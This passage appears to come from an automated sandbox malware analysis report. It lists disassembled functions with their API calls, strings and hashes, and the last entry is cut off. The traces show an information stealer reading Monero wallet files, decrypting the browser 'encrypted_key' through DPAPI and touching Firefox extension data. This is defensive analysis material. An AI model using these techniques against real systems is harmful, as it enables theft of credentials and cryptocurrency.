                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                • String ID: <
                                • API String ID: 1148417306-4251816714
                                • Opcode ID: 8af8667c5026cfd545557300969e80697d56db9ae25a2a433c3482a6d24d0910
                                • Instruction ID: 04fa4eb38ab3469246928e4e17e2ec76d1beb973233c9c386643f4a6285aafc6
                                • Opcode Fuzzy Hash: 8af8667c5026cfd545557300969e80697d56db9ae25a2a433c3482a6d24d0910
                                • Instruction Fuzzy Hash: C6312BB1901218ABDB15EB94DC92BDEB778EF44300F40919AF20A67281DF756B48CF79
                                Function 00DD87C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00DE0E28,00000000,?), ref: 00DD882F
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00DD8836
                                • wsprintfA.USER32 ref: 00DD8850
                                  • Part of subcall function 00DDA740: lstrcpy.KERNEL32(00DE0E17,00000000), ref: 00DDA788
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcesslstrcpywsprintf
                                • String ID: %dx%d
                                • API String ID: 1695172769-2206825331
                                • Opcode ID: 1bbeec9c7b1a786bf1e0011f6dd77e8b62a27495ca88f6b0c218973c2a469e29
                                • Instruction ID: 5553e75a9dcbe9613286b2345c006d6c7bc0a1f68829feeec8445a0981e660f5
                                • Opcode Fuzzy Hash: 1bbeec9c7b1a786bf1e0011f6dd77e8b62a27495ca88f6b0c218973c2a469e29
                                • Instruction Fuzzy Hash: F2212EB1A40308EFDB15DF94DD45FAEBBB8FB48711F104119F645A7284C77A99008BA0
                                Function 00DD8D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00DD951E,00000000), ref: 00DD8D5B
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00DD8D62
                                • wsprintfW.USER32 ref: 00DD8D78
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcesswsprintf
                                • String ID: %hs
                                • API String ID: 769748085-2783943728
                                • Opcode ID: 6a90792e348771b2dd14e2b9b18b676ae20d751dcb2ffbd20ecae49056ec33ff
                                • Instruction ID: 63a888d6fa3e34690dfcc6dbb6865977319fb5ea3857b0e232cd234a82ab5e1e
                                • Opcode Fuzzy Hash: 6a90792e348771b2dd14e2b9b18b676ae20d751dcb2ffbd20ecae49056ec33ff
                                • Instruction Fuzzy Hash: 09E08670B40308FFC710DB94DC09E5977B8EB04701F004054FD4987240D9765E008B61
                                Function 00DCA260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00DDA740: lstrcpy.KERNEL32(00DE0E17,00000000), ref: 00DDA788
                                  • Part of subcall function 00DDA9B0: lstrlen.KERNEL32(?,01629208,?,\Monero\wallet.keys,00DE0E17), ref: 00DDA9C5
                                  • Part of subcall function 00DDA9B0: lstrcpy.KERNEL32(00000000), ref: 00DDAA04
                                  • Part of subcall function 00DDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DDAA12
                                  • Part of subcall function 00DDA8A0: lstrcpy.KERNEL32(?,00DE0E17), ref: 00DDA905
                                  • Part of subcall function 00DD8B60: GetSystemTime.KERNEL32(00DE0E1A,0162A7E0,00DE05AE,?,?,00DC13F9,?,0000001A,00DE0E1A,00000000,?,01629208,?,\Monero\wallet.keys,00DE0E17), ref: 00DD8B86
                                  • Part of subcall function 00DDA920: lstrcpy.KERNEL32(00000000,?), ref: 00DDA972
                                  • Part of subcall function 00DDA920: lstrcat.KERNEL32(00000000), ref: 00DDA982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00DCA2E1
                                • lstrlen.KERNEL32(00000000,00000000), ref: 00DCA3FF
                                • lstrlen.KERNEL32(00000000), ref: 00DCA6BC
                                  • Part of subcall function 00DDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DDA7E6
                                • DeleteFileA.KERNEL32(00000000), ref: 00DCA743
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                • String ID:
                                • API String ID: 211194620-0
                                • Opcode ID: d0586a93a54239fa6f76a5fa6d67a3631d3f5f569d44910065fc96e067cd8345
                                • Instruction ID: 8bf15bb89c8db18739d89466b2eb8d91194328bf895d5c6bf3bcc741605d6ce9
                                • Opcode Fuzzy Hash: d0586a93a54239fa6f76a5fa6d67a3631d3f5f569d44910065fc96e067cd8345
                                • Instruction Fuzzy Hash: 82E10B729101589ACB15FBA8DC92EEE733CEF18300F50C16AF516B2191EF346A49DB76
                                Function 00DCD400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00DDA740: lstrcpy.KERNEL32(00DE0E17,00000000), ref: 00DDA788
                                  • Part of subcall function 00DDA9B0: lstrlen.KERNEL32(?,01629208,?,\Monero\wallet.keys,00DE0E17), ref: 00DDA9C5
                                  • Part of subcall function 00DDA9B0: lstrcpy.KERNEL32(00000000), ref: 00DDAA04
                                  • Part of subcall function 00DDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DDAA12
                                  • Part of subcall function 00DDA8A0: lstrcpy.KERNEL32(?,00DE0E17), ref: 00DDA905
                                  • Part of subcall function 00DD8B60: GetSystemTime.KERNEL32(00DE0E1A,0162A7E0,00DE05AE,?,?,00DC13F9,?,0000001A,00DE0E1A,00000000,?,01629208,?,\Monero\wallet.keys,00DE0E17), ref: 00DD8B86
                                  • Part of subcall function 00DDA920: lstrcpy.KERNEL32(00000000,?), ref: 00DDA972
                                  • Part of subcall function 00DDA920: lstrcat.KERNEL32(00000000), ref: 00DDA982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00DCD481
                                • lstrlen.KERNEL32(00000000), ref: 00DCD698
                                • lstrlen.KERNEL32(00000000), ref: 00DCD6AC
                                • DeleteFileA.KERNEL32(00000000), ref: 00DCD72B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                • String ID:
                                • API String ID: 211194620-0
                                • Opcode ID: b9589106ff7358e90636040ab70d5f0e7975e928e6c9f706c95696fd3047722d
                                • Instruction ID: 71de8653ebdf158281472a1bf9d0fd4dd78c4478010da21ddf391e10647eb2d5
                                • Opcode Fuzzy Hash: b9589106ff7358e90636040ab70d5f0e7975e928e6c9f706c95696fd3047722d
                                • Instruction Fuzzy Hash: EE912C729101589BCB15FBA8DC92EEE7338EF54300F50816AF507A7291EF346A09DB76
                                Function 00DCD780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00DDA740: lstrcpy.KERNEL32(00DE0E17,00000000), ref: 00DDA788
                                  • Part of subcall function 00DDA9B0: lstrlen.KERNEL32(?,01629208,?,\Monero\wallet.keys,00DE0E17), ref: 00DDA9C5
                                  • Part of subcall function 00DDA9B0: lstrcpy.KERNEL32(00000000), ref: 00DDAA04
                                  • Part of subcall function 00DDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DDAA12
                                  • Part of subcall function 00DDA8A0: lstrcpy.KERNEL32(?,00DE0E17), ref: 00DDA905
                                  • Part of subcall function 00DD8B60: GetSystemTime.KERNEL32(00DE0E1A,0162A7E0,00DE05AE,?,?,00DC13F9,?,0000001A,00DE0E1A,00000000,?,01629208,?,\Monero\wallet.keys,00DE0E17), ref: 00DD8B86
                                  • Part of subcall function 00DDA920: lstrcpy.KERNEL32(00000000,?), ref: 00DDA972
                                  • Part of subcall function 00DDA920: lstrcat.KERNEL32(00000000), ref: 00DDA982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00DCD801
                                • lstrlen.KERNEL32(00000000), ref: 00DCD99F
                                • lstrlen.KERNEL32(00000000), ref: 00DCD9B3
                                • DeleteFileA.KERNEL32(00000000), ref: 00DCDA32
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                • String ID:
                                • API String ID: 211194620-0
                                • Opcode ID: 60b6278ed58fcfc2d0161e409def166ed3283d770dd7996206a565d95a50aca5
                                • Instruction ID: f6765c1cce95fe054d884d45c8a16b511423801c355ee7c5e536e9282b2939a3
                                • Opcode Fuzzy Hash: 60b6278ed58fcfc2d0161e409def166ed3283d770dd7996206a565d95a50aca5
                                • Instruction Fuzzy Hash: 448110729101589BCB15FBA8DC96EEE7338EF54300F50812AF407A7291EF746A09DB76
                                Function 00DCF4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00DDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DDA7E6
                                  • Part of subcall function 00DC99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DC99EC
                                  • Part of subcall function 00DC99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00DC9A11
                                  • Part of subcall function 00DC99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00DC9A31
                                  • Part of subcall function 00DC99C0: ReadFile.KERNEL32(000000FF,?,00000000,00DC148F,00000000), ref: 00DC9A5A
                                  • Part of subcall function 00DC99C0: LocalFree.KERNEL32(00DC148F), ref: 00DC9A90
                                  • Part of subcall function 00DC99C0: CloseHandle.KERNEL32(000000FF), ref: 00DC9A9A
                                  • Part of subcall function 00DD8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00DD8E52
                                  • Part of subcall function 00DDA740: lstrcpy.KERNEL32(00DE0E17,00000000), ref: 00DDA788
                                  • Part of subcall function 00DDA9B0: lstrlen.KERNEL32(?,01629208,?,\Monero\wallet.keys,00DE0E17), ref: 00DDA9C5
                                  • Part of subcall function 00DDA9B0: lstrcpy.KERNEL32(00000000), ref: 00DDAA04
                                  • Part of subcall function 00DDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DDAA12
                                  • Part of subcall function 00DDA8A0: lstrcpy.KERNEL32(?,00DE0E17), ref: 00DDA905
                                  • Part of subcall function 00DDA920: lstrcpy.KERNEL32(00000000,?), ref: 00DDA972
                                  • Part of subcall function 00DDA920: lstrcat.KERNEL32(00000000), ref: 00DDA982
                                • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00DE1580,00DE0D92), ref: 00DCF54C
                                • lstrlen.KERNEL32(00000000), ref: 00DCF56B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                • String ID: ^userContextId=4294967295$moz-extension+++
                                • API String ID: 998311485-3310892237
                                • Opcode ID: c160aefa0f8d8db6d6c095141720b0cc5e0d7478421fe2fb68ff90c3f3c10686
                                • Instruction ID: 483662e5ef7acdde37faaaf3453255d88fc020a86aaf7da36ff7e4eae4ab8b71
                                • Opcode Fuzzy Hash: c160aefa0f8d8db6d6c095141720b0cc5e0d7478421fe2fb68ff90c3f3c10686
                                • Instruction Fuzzy Hash: 01512175D10148AADB14FBB8DC96EED7338EF54300F40C52AF81667291EE346A09DBB6
                                Function 00DD3560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID:
                                • API String ID: 367037083-0
                                • Opcode ID: f7ff5ae165f3f6ae56368b0b6c7b75cded71cede55172716c08751cc627a8588
                                • Instruction ID: c8fedc887b02fe5305083bee588f1846f92cb4bc18ef420763087b62d5a44162
                                • Opcode Fuzzy Hash: f7ff5ae165f3f6ae56368b0b6c7b75cded71cede55172716c08751cc627a8588
                                • Instruction Fuzzy Hash: BA410D71D10209AFCB04EFA9D845AFEBB78EF54304F048019E41666390DB75AA49CFB2
                                Function 00DC9CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00DDA740: lstrcpy.KERNEL32(00DE0E17,00000000), ref: 00DDA788
                                  • Part of subcall function 00DC99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DC99EC
                                  • Part of subcall function 00DC99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00DC9A11
                                  • Part of subcall function 00DC99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00DC9A31
                                  • Part of subcall function 00DC99C0: ReadFile.KERNEL32(000000FF,?,00000000,00DC148F,00000000), ref: 00DC9A5A
                                  • Part of subcall function 00DC99C0: LocalFree.KERNEL32(00DC148F), ref: 00DC9A90
                                  • Part of subcall function 00DC99C0: CloseHandle.KERNEL32(000000FF), ref: 00DC9A9A
                                  • Part of subcall function 00DD8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00DD8E52
                                • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00DC9D39
                                  • Part of subcall function 00DC9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00DC4EEE,00000000,00000000), ref: 00DC9AEF
                                  • Part of subcall function 00DC9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00DC4EEE,00000000,?), ref: 00DC9B01
                                  • Part of subcall function 00DC9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00DC4EEE,00000000,00000000), ref: 00DC9B2A
                                  • Part of subcall function 00DC9AC0: LocalFree.KERNEL32(?,?,?,?,00DC4EEE,00000000,?), ref: 00DC9B3F
                                  • Part of subcall function 00DC9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00DC9B84
                                  • Part of subcall function 00DC9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00DC9BA3
                                  • Part of subcall function 00DC9B60: LocalFree.KERNEL32(?), ref: 00DC9BD3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                • String ID: $"encrypted_key":"$DPAPI
                                • API String ID: 2100535398-738592651
                                • Opcode ID: 69939f168fb7e18bd2885700a1efc3a117508aec1a61558fd9dc3d5fc8cda4f9
                                • Instruction ID: 1400dfa006df6a8ecb108fb10b356cb80c5ef434999eba5f1d1729cfe0fae741
                                • Opcode Fuzzy Hash: 69939f168fb7e18bd2885700a1efc3a117508aec1a61558fd9dc3d5fc8cda4f9
                                • Instruction Fuzzy Hash: 4A310DB5D1020AABCB14DBE4DC99FEEB7B8AB48304F144519E906A7241EB359A04CBB5
                                Function 00DD92E0 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileA.KERNEL32(00DD3AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00DD3AEE,?), ref: 00DD92FC
                                • GetFileSizeEx.KERNEL32(000000FF,00DD3AEE), ref: 00DD9319
                                • CloseHandle.KERNEL32(000000FF), ref: 00DD9327
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
